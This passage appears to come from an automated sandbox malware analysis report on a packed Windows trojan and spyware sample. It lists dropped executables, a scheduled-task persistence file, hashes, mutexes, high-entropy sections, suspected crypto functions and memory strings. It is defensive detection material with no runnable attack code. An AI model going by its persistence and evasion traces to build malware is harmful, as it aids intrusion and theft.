memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_b6a0e6f8-d
PE file contains section with special chars
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name:
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name: .idata
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .rsrc
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name:
Source: skotes.exe.9.dr Static PE information: section name: .idata
Source: skotes.exe.9.dr Static PE information: section name:
Source: fa55e7c5ed.exe.11.dr Static PE information: section name:
Source: fa55e7c5ed.exe.11.dr Static PE information: section name: .rsrc
Source: fa55e7c5ed.exe.11.dr Static PE information: section name: .idata
Source: fa55e7c5ed.exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name:
Source: random[1].exe.11.dr Static PE information: section name: .idata
Source: random[1].exe.11.dr Static PE information: section name:
Source: 0718eb7837.exe.11.dr Static PE information: section name:
Source: 0718eb7837.exe.11.dr Static PE information: section name: .idata
Source: 0718eb7837.exe.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name:
Source: random[1].exe0.11.dr Static PE information: section name: .idata
Source: random[1].exe0.11.dr Static PE information: section name:
Source: aedbd2e320.exe.11.dr Static PE information: section name:
Source: aedbd2e320.exe.11.dr Static PE information: section name: .idata
Source: aedbd2e320.exe.11.dr Static PE information: section name:
Source: random[2].exe.11.dr Static PE information: section name:
Source: random[2].exe.11.dr Static PE information: section name: .idata
Source: 2aff342b40.exe.11.dr Static PE information: section name:
Source: 2aff342b40.exe.11.dr Static PE information: section name: .idata
Contains functionality to call native functions
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6862C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy, 0_2_6C6862C0
Creates files inside the system directory
Source: C:\Users\user\DocumentsKECFIDGCBF.exe File created: C:\Windows\Tasks\skotes.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50AC60 0_2_6C50AC60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C6C00 0_2_6C5C6C00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DAC30 0_2_6C5DAC30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55ECD0 0_2_6C55ECD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4FECC0 0_2_6C4FECC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CED70 0_2_6C5CED70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62AD50 0_2_6C62AD50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C688D20 0_2_6C688D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C68CDC0 0_2_6C68CDC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596D90 0_2_6C596D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C504DB0 0_2_6C504DB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59EE70 0_2_6C59EE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E0E20 0_2_6C5E0E20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50AEC0 0_2_6C50AEC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A0EC0 0_2_6C5A0EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C586E90 0_2_6C586E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C56EF40 0_2_6C56EF40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C2F70 0_2_6C5C2F70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C506F10 0_2_6C506F10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C640F20 0_2_6C640F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DEFF0 0_2_6C5DEFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C500FE0 0_2_6C500FE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C648FB0 0_2_6C648FB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50EFB0 0_2_6C50EFB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D4840 0_2_6C5D4840
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C550820 0_2_6C550820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58A820 0_2_6C58A820
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6068E0 0_2_6C6068E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C538960 0_2_6C538960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C556900 0_2_6C556900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61C9E0 0_2_6C61C9E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5349F0 0_2_6C5349F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C09B0 0_2_6C5C09B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5909A0 0_2_6C5909A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BA9A0 0_2_6C5BA9A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57CA70 0_2_6C57CA70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5AEA00 0_2_6C5AEA00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B8A30 0_2_6C5B8A30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57EA80 0_2_6C57EA80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C606BE0 0_2_6C606BE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A0BA0 0_2_6C5A0BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C508BAC 0_2_6C508BAC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C518460 0_2_6C518460
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58A430 0_2_6C58A430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C564420 0_2_6C564420
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5464D0 0_2_6C5464D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59A4D0 0_2_6C59A4D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C62A480 0_2_6C62A480
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C558540 0_2_6C558540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C604540 0_2_6C604540
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A0570 0_2_6C5A0570
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C648550 0_2_6C648550
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C562560 0_2_6C562560
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58E5F0 0_2_6C58E5F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CA5E0 0_2_6C5CA5E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F45B0 0_2_6C4F45B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55C650 0_2_6C55C650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5246D0 0_2_6C5246D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55E6E0 0_2_6C55E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59E6E0 0_2_6C59E6E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C580700 0_2_6C580700
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C52A7D0 0_2_6C52A7D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54E070 0_2_6C54E070
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C8010 0_2_6C5C8010
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CC000 0_2_6C5CC000
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F8090 0_2_6C4F8090
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5100B0 0_2_6C5100B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DC0B0 0_2_6C5DC0B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C568140 0_2_6C568140
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C576130 0_2_6C576130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E4130 0_2_6C5E4130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5001E0 0_2_6C5001E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6561B0 0_2_6C6561B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C598250 0_2_6C598250
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C588260 0_2_6C588260
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CA210 0_2_6C5CA210
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D8220 0_2_6C5D8220
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6862C0 0_2_6C6862C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51A2B0 0_2_6C51A2B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5CE2B0 0_2_6C5CE2B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D22A0 0_2_6C5D22A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61C360 0_2_6C61C360
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C508340 0_2_6C508340
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C642370 0_2_6C642370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C502370 0_2_6C502370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C596370 0_2_6C596370
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C572320 0_2_6C572320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5543E0 0_2_6C5543E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55E3B0 0_2_6C55E3B0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5323A0 0_2_6C5323A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C503C40 0_2_6C503C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C629C40 0_2_6C629C40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C511C30 0_2_6C511C30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C63DCD0 0_2_6C63DCD0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C1CE0 0_2_6C5C1CE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59FC80 0_2_6C59FC80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C563D00 0_2_6C563D00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D1DC0 0_2_6C5D1DC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F3D80 0_2_6C4F3D80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C649D90 0_2_6C649D90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C685E60 0_2_6C685E60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65BE70 0_2_6C65BE70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C60DE10 0_2_6C60DE10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C523EC0 0_2_6C523EC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C657F20 0_2_6C657F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C535F20 0_2_6C535F20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F5F30 0_2_6C4F5F30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C61DFC0 0_2_6C61DFC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C683FC0 0_2_6C683FC0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5ABFF0 0_2_6C5ABFF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C521F90 0_2_6C521F90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C55D810 0_2_6C55D810
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C65B8F0 0_2_6C65B8F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C59F8C0 0_2_6C59F8C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DF8F0 0_2_6C5DF8F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C50D8E0 0_2_6C50D8E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5338E0 0_2_6C5338E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C57F960 0_2_6C57F960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5BD960 0_2_6C5BD960
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64F900 0_2_6C64F900
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5B5920 0_2_6C5B5920
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5399D0 0_2_6C5399D0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5999C0 0_2_6C5999C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5659F0 0_2_6C5659F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5979F0 0_2_6C5979F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5D1990 0_2_6C5D1990
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C511980 0_2_6C511980
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C689A50 0_2_6C689A50
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C53FA10 0_2_6C53FA10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5A1A10 0_2_6C5A1A10
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5FDA30 0_2_6C5FDA30
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C501AE0 0_2_6C501AE0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DDAB0 0_2_6C5DDAB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5DFB60 0_2_6C5DFB60
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C54BB20 0_2_6C54BB20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C51BBD4 0_2_6C51BBD4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C547BF0 0_2_6C547BF0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E5B90 0_2_6C5E5B90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C4F1B80 0_2_6C4F1B80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5C9BB0 0_2_6C5C9BB0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C559BA0 0_2_6C559BA0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C58D410 0_2_6C58D410
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5E9430 0_2_6C5E9430
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5014E0 0_2_6C5014E0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C6814A0 0_2_6C6814A0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C515510 0_2_6C515510
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C567500 0_2_6C567500
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C64F510 0_2_6C64F510
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C5855F0 0_2_6C5855F0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C539590 0_2_6C539590
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C519650 0_2_6C519650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C555640 0_2_6C555640
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C577610 0_2_6C577610
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C529600 0_2_6C529600
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_009FE530 11_2_009FE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A378BB 11_2_00A378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A38860 11_2_00A38860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A37049 11_2_00A37049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A331A8 11_2_00A331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_009F4DE0 11_2_009F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A32D10 11_2_00A32D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A3779B 11_2_00A3779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_00A27F36 11_2_00A27F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 11_2_009F4B30 11_2_009F4B30
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe Code function: 14_3_05EA8AF8 14_3_05EA8AF8
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C523620 appears 97 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C6809D0 appears 220 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C55C5E0 appears 35 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C529B10 appears 107 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C639F30 appears 52 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C68D930 appears 41 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 6C68DAE0 appears 48 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2157820790.000000006F902000.00000002.00000001.01000000.0000000A.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Uses 32bit PE files
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe Static PE information: Section: wkrmqwho ZLIB complexity 0.9946027695407542
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: Section: ZLIB complexity 0.9976370912806539
Source: DocumentsKECFIDGCBF.exe.0.dr Static PE information: Section: brwftgiw ZLIB complexity 0.9945341117216118
Source: random[1].exe.0.dr Static PE information: Section: bgrcdjci ZLIB complexity 0.9944399207746479
Source: skotes.exe.9.dr Static PE information: Section: ZLIB complexity 0.9976370912806539
Source: skotes.exe.9.dr Static PE information: Section: brwftgiw ZLIB complexity 0.9945341117216118
Source: fa55e7c5ed.exe.11.dr Static PE information: Section: bgrcdjci ZLIB complexity 0.9944399207746479
Source: random[1].exe.11.dr Static PE information: Section: ZLIB complexity 0.9992699795081967
Source: random[1].exe.11.dr Static PE information: Section: ackgsmri ZLIB complexity 0.9945644946808511
Source: 0718eb7837.exe.11.dr Static PE information: Section: ZLIB complexity 0.9992699795081967
Source: 0718eb7837.exe.11.dr Static PE information: Section: ackgsmri ZLIB complexity 0.9945644946808511
Source: random[1].exe0.11.dr Static PE information: Section: wkrmqwho ZLIB complexity 0.9946027695407542
Source: aedbd2e320.exe.11.dr Static PE information: Section: wkrmqwho ZLIB complexity 0.9946027695407542
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@94/57@67/12
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6C560300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 0_2_6C560300
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SLHTRKHN.htm Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3704:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03
Source: C:\Users\user\DocumentsKECFIDGCBF.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985 Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Program Files\Mozilla Firefox\firefox.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\Desktop\file.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: chrome.exe, 00000022.00000002.3004636584.00006DEC00792000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
